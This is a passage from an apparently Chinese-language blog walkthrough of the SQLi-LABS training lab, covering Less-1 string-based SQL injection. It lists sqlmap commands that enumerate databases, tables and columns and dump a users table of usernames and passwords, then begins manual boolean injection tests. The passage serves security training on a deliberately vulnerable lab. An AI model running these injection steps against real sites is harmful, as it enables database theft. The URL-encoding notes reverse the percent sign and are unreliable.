目录
SQLi-LABS Page-1(Basic Challenges)
Less-1 **Error Based- String**(字符型注入')
Less-2 **Error Based- Intiger**(整数型注入)
Less-3 Error Based- String (with Twist)(闭合'))
Less-4 Error Based- DoubleQuotes String(闭合"))
Less-5 Double Query- Single Quotes- String(报错注入)
注1:首先要判断闭合方式
注2:一定要注意url地址栏的闭合符合中英文
注3:url编码:空格为20%,'为27%,#为23%
SQLi-LABS Page-1(Basic Challenges)
Less-1 **Error Based- String**(字符型注入')
less-1 字符型注入_C4n的博客-CSDN博客_字符型注入
https://www.cnblogs.com/Timesi/p/16659193.html
方法一:SQLMAP注入
(1)判断注入点
sqlmap -u "url?id=1"
(2)爆数据库信息
sqlmap -u "url?id=1" --dbs
(3)爆当前数据库信息(security)
sqlmap -u "url?id=1" --current-db
(4)爆指定数据库中所有表信息(users)
sqlmap -u "url?id=1" -D security --tables
(5)爆指定表的所有列的段名(username,password)
sqlmap -u "url?id=1" -D security -T users --columns
(6)爆表中所有内容(爆库)
sqlmap -u "url?id=1" -D security -T users -C id,password,username --dump
方法二:手工注入
(1)判断注入点
url?id=1’报错
(2)判断注入类型
如果是数字型注入:
1 and 1=1 正确
1 and 1=2 错误
select * from table_name where id=xxx